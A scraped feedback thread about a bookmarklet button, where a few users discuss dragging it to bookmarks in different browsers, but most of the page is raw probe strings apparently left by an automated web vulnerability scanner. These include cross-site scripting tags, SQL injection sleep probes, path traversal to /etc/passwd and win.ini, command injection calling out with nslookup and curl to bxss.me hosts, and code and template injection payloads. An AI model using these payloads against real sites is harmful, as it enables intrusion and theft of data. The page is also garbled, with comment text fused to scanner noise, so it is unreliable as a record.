Feedback
Submit suggestionButton by Cottonball - 153 months ago
it wont let me drag the button to my bookmarks! ive tried everything
it wont let me drag the button to my bookmarks! ive tried everything
483 agree
Unvote8064 agree
2858 agree
799 agree
772 agree
746 agree
746 agree
710 agree
681 agree
661 agree
661 agree
645 agree
632 agree
623 agree
622 agree
602 agree
592 agree
590 agree
579 agree
579 agree
572 agree
566 agree
565 agree
564 agree
564 agree
558 agree
552 agree
522 agree
522 agree
519 agree
511 agree
506 agree
497 agree
495 agree
493 agree
490 agree
488 agree
483 agree
479 agree
476 agree
469 agree
467 agree
465 agree
462 agree
461 agree
455 agree
455 agree
441 agree
434 agree
432 agree
420 agree
BeyPokéDig
Which browser do you use? Works for me in Google Chrome, but I haven't figured out how to make it work in Internet Explorer (which I prefer) yet.CrazyDeathling
It works for me on Internet explorer. I simply just clicked and dragged itDevilishDB
Maybe Cottonball and BeyPokeDig use IE8 but CrazyDeathling uses IE9.DevilishDB
Or it might be you have to show the bar (right-click -> show favourites bar or something similar).lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1CVdBcsm48O1C87oiPaGzO
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
${10000230+10000137}${10000327+9999004}
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
response.write(9479608*9321086)WfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
'+response.write(9479608*9321086)+'WfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
file:///etc/passwdWfxYANoW
"+response.write(9479608*9321086)+"WfxYANoW
/etc/shellsWfxYANoW
../../../../../../../../../../../../../../etc/shellsAnonymous
1WfxYANoW
c:/windows/win.iniWfxYANoW
bxss.meWfxYANoW
1response.write(9790939*9141171)
1WfxYANoW
../1'+response.write(9790939*9141171)+'
1"+response.write(9790939*9141171)+"
11yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1Http://bxss.me/t/fit.txt
1file:///etc/passwd
1WfxYANoW
echo bdtuqn$()\ pbkqht\nz^xyu||a #' &echo bdtuqn$()\ pbkqht\nz^xyu||a #|" &echo bdtuqn$()\ pbkqht\nz^xyu||a #WfxYANoW
4wCKPcIIWfxYANoW
1WfxYANoW
&echo nythba$()\ rubcii\nz^xyu||a #' &echo nythba$()\ rubcii\nz^xyu||a #|" &echo nythba$()\ rubcii\nz^xyu||a #http://bxss.me/t/fit.txt?.jpg
1WfxYANoW
1WfxYANoW
BNTEBq5d: tTyjug3RWfxYANoW
1&echo lvqzkz$()\ ucxrck\nz^xyu||a #' &echo lvqzkz$()\ ucxrck\nz^xyu||a #|" &echo lvqzkz$()\ ucxrck\nz^xyu||a #../WfxYANoW
1/etc/shells
1WfxYANoW
|echo acvncq$()\ fqldfm\nz^xyu||a #' |echo acvncq$()\ fqldfm\nz^xyu||a #|" |echo acvncq$()\ fqldfm\nz^xyu||a #sbFxYfGR
1WfxYANoW
1|echo bpcdbl$()\ ircowd\nz^xyu||a #' |echo bpcdbl$()\ ircowd\nz^xyu||a #|" |echo bpcdbl$()\ ircowd\nz^xyu||a #WfxYANoW
1&n925458=v980423c:/windows/win.ini
1WfxYANoW
(nslookup -q=cname hitbhxbzstmxfa0d84.bxss.me||curl hitbhxbzstmxfa0d84.bxss.me))K8OA01oD: GdBbTeuF
1MEZ5R3hQVTA=
1bxss.me
1WfxYANoW&n964832=v944305
1WfxYANoW
)WfxYANoW
!(()&&!|*|*|WfxYANoW
'.gethostbyname(lc('hitbj'.'ajbxmmctf33ce.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(81).chr(115).chr(79).'WfxYANoW
$(nslookup -q=cname hitlohbmkdulp4896a.bxss.me||curl hitlohbmkdulp4896a.bxss.me)WfxYANoW
^(#$!@#$)(()))******)
1WfxYANoW
&nslookup -q=cname hitrkdzvpknlk6ac1a.bxss.me&'\"`0&nslookup -q=cname hitrkdzvpknlk6ac1a.bxss.me&`'!(()&&!|*|*|
1WfxYANoW
&(nslookup -q=cname hituudosxtrcnc94e4.bxss.me||curl hituudosxtrcnc94e4.bxss.me)&'\"`0&(nslookup -q=cname hituudosxtrcnc94e4.bxss.me||curl hituudosxtrcnc94e4.bxss.me)&`'WfxYANoW
|(nslookup -q=cname hitqenyonpndv3b988.bxss.me||curl hitqenyonpndv3b988.bxss.me)WfxYANoW
1WfxYANoW
".gethostbyname(lc("hitsi"."shdvjwkd5fb45.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(85).chr(107).chr(69)."WfxYANoW
gethostbyname(lc('hitbr'.'udsynkyl99865.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(85).chr(107).chr(80)^(#$!@#$)(()))******
1WfxYANoW
'"()WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
`(nslookup -q=cname hitahrlnsjdij26b89.bxss.me||curl hitahrlnsjdij26b89.bxss.me)`WfxYANoW
1'&&sleep(27*1000)*ehvnyj&&'WfxYANoW
';print(md5(31337));$a='WfxYANoW
";print(md5(31337));$a="WfxYANoW
;(nslookup -q=cname hitdbaxdjzybt383a1.bxss.me||curl hitdbaxdjzybt383a1.bxss.me)|(nslookup -q=cname hitdbaxdjzybt383a1.bxss.me||curl hitdbaxdjzybt383a1.bxss.me)&(nslookup -q=cname hitdbaxdjzybt383a1.bxss.me||curl hitdbaxdjzybt383a1.bxss.me)WfxYANoW
${@print(md5(31337))}WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitznmiuitllq18d3e.bxss.me||curl${IFS}hitznmiuitllq18d3e.bxss.me)WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
${@print(md5(31337))}\WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitkxcouavtqj5f284.bxss.me||curl${IFS}hitkxcouavtqj5f284.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitkxcouavtqj5f284.bxss.me||curl${IFS}hitkxcouavtqj5f284.bxss.me)&`'WfxYANoW
1"&&sleep(27*1000)*scsxsf&&"WfxYANoW
1'||sleep(27*1000)*lvcbtp||'WfxYANoW
xfs.bxss.meWfxYANoW
1"||sleep(27*1000)*wawltr||"xfs.bxss.me
1WfxYANoW
'.print(md5(31337)).'WfxYANoW
'"WfxYANoW
<!--'"
1';print(md5(31337));$a='
1<!--
1WfxYANoW
1";print(md5(31337));$a="
1WfxYANoW
1'"()&%<zzz><ScRiPt >CuAQ(9348)</ScRiPt>${@print(md5(31337))}
1WfxYANoW
'"()&%<zzz><ScRiPt >CuAQ(9910)</ScRiPt>${@print(md5(31337))}\
1'"()
1WfxYANoW'&&sleep(27*1000)*ecjfgv&&'
1WfxYANoW"&&sleep(27*1000)*tczwjp&&"
1WfxYANoW'||sleep(27*1000)*dwqoqg||'
1'.print(md5(31337)).'
1WfxYANoW"||sleep(27*1000)*wylalb||"
1WfxYANoW
19594416WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(102).concat(73).concat(116).concat(74)+(require"socket" Socket.gethostbyname("hitxo"+"xqsrlqzz5c30f.bxss.me.")[3].to_s)+"WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(102).concat(79).concat(114).concat(78)+(require'socket' Socket.gethostbyname('hitot'+'wecpgjqm985f5.bxss.me.')[3].to_s)+'WfxYANoW
bfg1101<s1﹥s2ʺs3ʹhjl1101HttP://bxss.me/t/xss.html?%00
1WfxYANoW
'A'.concat(70-3).concat(22*4).concat(118).concat(66).concat(100).concat(80)+(require'socket' Socket.gethostbyname('hitsr'+'rqpcddcdc20f6.bxss.me.')[3].to_s)bxss.me/t/xss.html?%00
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
commentWfxYANoW
comment�WfxYANoW
comment/.comment
1WfxYANoW
1WfxYANoW
<th:t="${dfb}#foreachcomment�
1comment/.
1WfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >CuAQ(9953)</ScRiPt>WfxYANoW
1Pek03RZTWfxYANoW
1<WUSGCQ>UJG47[!+!]</WUSGCQ>WfxYANoW
1<script>CuAQ(9730)</script>WfxYANoW
1<script>CuAQ(9035)</script>9035WfxYANoW
1<ScR<ScRiPt>IpT>CuAQ(9852)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >CuAQ(9869)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9487></ScRiPt>WfxYANoW
1<�ScRiPt >CuAQ(9599)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=CuAQ(9541)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9829'>WfxYANoW
1<body onload=CuAQ(9060)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=CuAQ(9292)>WfxYANoW
1WfxYANoW
1<img src=xyz OnErRor=CuAQ(9835)>WfxYANoW
1<img/src=">" onerror=alert(9506)>WfxYANoW
-1 OR 2+561-561-1=0+0+0+1 --WfxYANoW
-1 OR 2+954-954-1=0+0+0+1WfxYANoW
-1' OR 2+450-450-1=0+0+0+1 --WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%43%75%41%51%289935%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
-1' OR 2+688-688-1=0+0+0+1 or 'LHmMM0Hc'='WfxYANoW
-1" OR 2+735-735-1=0+0+0+1 --WfxYANoW
1\u003CScRiPt\CuAQ(9920)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>CuAQ(9457)</sCripT>WfxYANoW
1<input autofocus onfocus=CuAQ(9692)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(CuAQ(9072))}WfxYANoW
12CKsd <ScRiPt >CuAQ(9442)</ScRiPt>WfxYANoW
1<W0WPSQ>O9FLX[!+!]</W0WPSQ>WfxYANoW
1<ifRAme sRc=9650.com></IfRamE>WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW
1<aVEBq37 x=9418>WfxYANoW
1<img sRc='http://attacker-9265/log.php?WfxYANoW
1<aZpPPjj<WfxYANoW'"()&%<zzz><ScRiPt >CuAQ(9713)</ScRiPt>
1'"()&%<zzz><ScRiPt >CuAQ(9888)</ScRiPt>
1WfxYANoW9768004
1bfg7604<s1﹥s2ʺs3ʹhjl7604
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Zdfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >CuAQ(9104)</ScRiPt>
1WfxYANoW<WONNJ5>BARPW[!+!]</WONNJ5>
1WfxYANoW<script>CuAQ(9362)</script>
1WfxYANoW<script>CuAQ(9991)</script>9991
1WfxYANoW<ScRiPt >CuAQ(9962)</ScRiPt>
1WfxYANoW<�ScRiPt >CuAQ(9011)</ScRiPt>
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW<body onload=CuAQ(9731)>
1WfxYANoW<img src=xyz OnErRor=CuAQ(9569)>
1WfxYANoW<img/src=">" onerror=alert(9579)>
1WfxYANoW\u003CScRiPt\CuAQ(9684)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>CuAQ(9157)</sCripT>
1WfxYANoW<input autofocus onfocus=CuAQ(9527)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(CuAQ(9546))}
1WfxYANoWvqj0V <ScRiPt >CuAQ(9287)</ScRiPt>
1WfxYANoW<W3MMKA>2VQEP[!+!]</W3MMKA>
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW<ifRAme sRc=9771.com></IfRamE>
1WfxYANoW<a4pZomq x=9086>
1WfxYANoW<img sRc='http://attacker-9954/log.php?
1WfxYANoW<aIb3bJk<
1WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1sPlseARe'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 276=(SELECT 276 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 140=(SELECT 140 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 135=(SELECT 135 FROM PG_SLEEP(15))--WfxYANoW
1AiB5V4MN' OR 307=(SELECT 307 FROM PG_SLEEP(15))--WfxYANoW
1GqweEWtk') OR 694=(SELECT 694 FROM PG_SLEEP(15))--WfxYANoW
1e0sLjeuY')) OR 375=(SELECT 375 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@o4bG2WfxYANoW
1WfxYANoW
1WfxYANoWlllhbbJ2
1WfxYANoW
1-1 OR 2+75-75-1=0+0+0+1 --
1-1 OR 2+191-191-1=0+0+0+1
1-1' OR 2+249-249-1=0+0+0+1 --
1-1' OR 2+53-53-1=0+0+0+1 or 'rrzKr6hL'='
1-1" OR 2+729-729-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoW8DYzu6H5'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@ttCKt
1Pecedec150
555-555-0199@example.comPecedec150
555-555-0199@example.comoawhjjoc
1akuifeaw
response.write(9153652*9241724)jrsotvnp
1akuifeaw
'+response.write(9153652*9241724)+'lxibtsui
set|set&setfcgsdfcs
5uSvzg4hjrsotvnp
1akuifeaw
"+response.write(9153652*9241724)+"lxibtsui
$(nslookup aOIv64rm)16HJeHMb
1jrsotvnp
2q9pIPVmaicchjeg
../../../../../../../../../../etc/passwdresponse.write(9006303*9060685)
1lxibtsui
&nslookup HVPY9c6F&'\"`0&nslookup HVPY9c6F&`'quxmjmpq
1jrsotvnp
-1 OR 2+997-997-1=0+0+0+1 --aicchjeg
../../../../../../../../../../../../../../../proc/version'+response.write(9006303*9060685)+'
1set|set&set
1jrsotvnp
-1 OR 2+191-191-1=0+0+0+1aicchjeg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg"+response.write(9006303*9060685)+"
1$(nslookup qLR3wYX5)
1jrsotvnp
-1' OR 2+153-153-1=0+0+0+1 --aicchjeg
../../../../../../../../../../etc/passwd�.jpgmwipcaxm
${9999042+9999878}&nslookup FeBfChSj&'\"`0&nslookup FeBfChSj&`'
1tilowpgj
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgjrsotvnp
-1' OR 2+730-730-1=0+0+0+1 or '98JEMGdr'='aicchjeg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg${9999820+10000043}
1eWptUUt6Vnk=
1tilowpgj
1some_inexistent_file_with_long_name�.jpgquxmjmpq
1jrsotvnp
-1" OR 2+754-754-1=0+0+0+1 --aicchjeg
/../..//../..//../..//../..//../..//etc/passwd�.jpgjbfbsjns
1&n966479=v931121cqytrpqb
)tilowpgj
Http://testasp.vulnweb.com/t/fit.txtAnonymous
1jrsotvnp
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/aicchjeg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdcqytrpqb
!(()&&!|*|*|tilowpgj
http://testasp.vulnweb.com/t/fit.txt?.jpgjrsotvnp
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/aicchjeg
/etc/passwdonlrxunv&n952335=v942696
1cqytrpqb
^(#$!@#$)(()))******tilowpgj
testasp.vulnweb.comjrsotvnp
-1; waitfor delay '0:0:10' --aicchjeg
%2fetc%2fpasswd)
1jrsotvnp
-1); waitfor delay '0:0:15' --aicchjeg
/.././.././.././.././.././.././.././../etc/./passwd%00waxksfbb
;print(md5(acunetix_wvs_security_test));pxapckme
http://testasp.vulnweb.com/t/xss.html?%00.jpg!(()&&!|*|*|
11some_inexistent_file_with_long_name�.jpg
1khydevla
'"()jrsotvnp
1 waitfor delay '0:0:15' --aicchjeg
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdqpwhftsa
1waxksfbb
';print(md5(acunetix_wvs_security_test));$a='http://testasp.vulnweb.com/t/xss.html?%00.jpg
1^(#$!@#$)(()))******
1Http://testasp.vulnweb.com/t/fit.txt
1jrsotvnp
B6qVUhDH'; waitfor delay '0:0:15' --aicchjeg
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdqpwhftsa
commentwaxksfbb
";print(md5(acunetix_wvs_security_test));$a="uiconqer
http://hitFZJIeKj3hO.bxss.me/lnivtheq
1http://testasp.vulnweb.com/t/fit.txt?.jpg
1'"()
1jrsotvnp
-1;select pg_sleep(5); --qpwhftsa
comment�waxksfbb
${@print(md5(acunetix_wvs_security_test))}lnivtheq
1'"http://hitkdvQneZQ0j.bxss.me/
1testasp.vulnweb.com
1cbhdwmct
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))jrsotvnp
-1;select pg_sleep(0); --aicchjeg
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.qpwhftsa
comment/.waxksfbb
${@print(md5(acunetix_wvs_security_test))}\lnivtheq
\germjbjs
/www.vulnweb.comywxbwnml
'"jrsotvnp
-1);select pg_sleep(5); --aicchjeg
file:///etc/passwdqpwhftsa
1;print(md5(acunetix_wvs_security_test));
1/www.vulnweb.com
1ywxbwnml
<!--olfmpwep
1'"()&%<acx><ScRiPt >tIUZ(9713)</ScRiPt>jrsotvnp
-1);select pg_sleep(10); --aicchjeg
/\../\../\../\../\../\../\../etc/passwdcomment
1';print(md5(acunetix_wvs_security_test));$a='
1lnivtheq
@@n7H6o'"
1jrsotvnp
-1));select pg_sleep(5); --aicchjeg
WEB-INF/web.xmlcomment�
1";print(md5(acunetix_wvs_security_test));$a="
1lnivtheq
JyI=<!--
1jrsotvnp
-1));select pg_sleep(15); --aicchjeg
/WEB-INF/web.xmlolfmpwep
'"()&%<acx><ScRiPt >tIUZ(9291)</ScRiPt>comment/.
1${@print(md5(acunetix_wvs_security_test))}
1jrsotvnp
x4XMl8T2';select pg_sleep(10); --aicchjeg
WEB-INF\web.xml${@print(md5(acunetix_wvs_security_test))}\
1jrsotvnp
1VBgjLQJ');select pg_sleep(10); --../../../../../../../../../../etc/passwd
1olfmpwep
1_9040lnivtheq
(select convert(int,CHAR(65)))jrsotvnp
47Gq5knt'));select pg_sleep(10); --lnivtheq
1jrsotvnp
1olfmpwep
acu5278<s1﹥s2ʺs3ʹuca52781'"
1jrsotvnp
1../../../../../../../../../../etc/passwd�.jpg
1\
138BGL0Lh
1-1 OR 2+10-10-1=0+0+0+1 --
1@@4DJqu
1-1 OR 2+98-98-1=0+0+0+1
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1JyI=
1olfmpwep
{{10000012*9999164}}-1' OR 2+141-141-1=0+0+0+1 --
1/etc/passwd
1-1' OR 2+333-333-1=0+0+0+1 or 'i08KEYVf'='
1%2fetc%2fpasswd
1olfmpwep
1<ScRiPt >tIUZ(9688)</ScRiPt>-1" OR 2+964-964-1=0+0+0+1 --
1(select convert(int,CHAR(65)))
1olfmpwep
1<W2XGJR>SUWQV[!+!]</W2XGJR>1 waitfor delay '0:0:4' --
1olfmpwep
1<script>tIUZ(9312)</script>2ePuGMpS'; waitfor delay '0:0:4' --
1oWXdLvax';select pg_sleep(4); --
1file:///etc/passwd
1p8KuBhsq');select pg_sleep(8); --
1olfmpwep
1<ScR<ScRiPt>IpT>tIUZ(9192)</sCr<ScRiPt>IpT>/\../\../\../\../\../\../\../etc/passwd
1byQolRA8'));select pg_sleep(8); --
1WEB-INF/web.xml
1olfmpwep
1<ScRiPt >tIUZ(9679)</ScRiPt>/WEB-INF/web.xml
1WEB-INF\web.xml
1olfmpwep
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9988></ScRiPt>olfmpwep
1<�ScRiPt >tIUZ(9818)</ScRiPt>olfmpwep
1<video><source onerror="javascript:tIUZ(9434)">olfmpwep
1<isindex type=image src=1 onerror=tIUZ(9509)>olfmpwep
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9248'>olfmpwep
1<body onload=tIUZ(9244)>olfmpwep
1<img src=//testasp.vulnweb.com/t/dot.gif onload=tIUZ(9202)>olfmpwep
1<img src=xyz OnErRor=tIUZ(9116)>olfmpwep
1<img/src=">" onerror=alert(9405)>olfmpwep
%31%3C%53%63%52%69%50%74%20%3E%74%49%55%5A%289826%29%3C%2F%73%43%72%69%70%54%3Eolfmpwep
1\u003CScRiPt\tIUZ(9085)\u003C/sCripT\u003Eolfmpwep
1<ScRiPt>tIUZ(9165)</sCripT>olfmpwep
1<input autofocus onfocus=tIUZ(9086)>olfmpwep
<a HrEF=http://www.vulnweb.com></a>olfmpwep
<a HrEF=jaVaScRiPT:>olfmpwep
[url=http://www.vulnweb.com][/url]olfmpwep
1<img<!-- --> src=x onerror=alert(9986);//><!-- -->olfmpwep
1}body{acu:Expre/**/SSion(tIUZ(9750))}olfmpwep
1<% contenteditable onresize=tIUZ(9132)>olfmpwep
1_QW5kD <ScRiPt >tIUZ(9188)</ScRiPt>olfmpwep
1<WQPV0B>ARPAK[!+!]</WQPV0B>olfmpwep
1<ifRAme sRc=9729.com></IfRamE>olfmpwep
1<N8wjpu x=9321>olfmpwep
1<img sRc='http://attacker-9003/log.php?olfmpwep'"()&%<acx><ScRiPt >tIUZ(9769)</ScRiPt>
1'"()&%<acx><ScRiPt >tIUZ(9613)</ScRiPt>
1olfmpwep_9003
1acu1062<s1﹥s2ʺs3ʹuca1062
1{{9999475*10000470}}
1olfmpwep<ScRiPt >tIUZ(9946)</ScRiPt>
1olfmpwep<WFM5NZ>IX7LC[!+!]</WFM5NZ>
1olfmpwep<script>tIUZ(9124)</script>
1olfmpwep<ScRiPt >tIUZ(9706)</ScRiPt>
1olfmpwep<�ScRiPt >tIUZ(9240)</ScRiPt>
1olfmpwep<body onload=tIUZ(9429)>
1olfmpwep<img src=xyz OnErRor=tIUZ(9859)>
1olfmpwep<img/src=">" onerror=alert(9858)>
1olfmpwep\u003CScRiPt\tIUZ(9817)\u003C/sCripT\u003E
1olfmpwep<ScRiPt>tIUZ(9054)</sCripT>
1olfmpwep<input autofocus onfocus=tIUZ(9762)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1olfmpwep}body{acu:Expre/**/SSion(tIUZ(9739))}
1olfmpwep<% contenteditable onresize=tIUZ(9529)>
1olfmpwep_egzLt <ScRiPt >tIUZ(9395)</ScRiPt>
1olfmpwep<WXP5DH>6NBZS[!+!]</WXP5DH>
1olfmpwep<ifRAme sRc=9385.com></IfRamE>
1olfmpwep<11OO3Y x=9253>
1olfmpwep<img sRc='http://attacker-9442/log.php?
1Deeksha09gau
it just doen't spawn the ship when I click the button in my bookmarkComment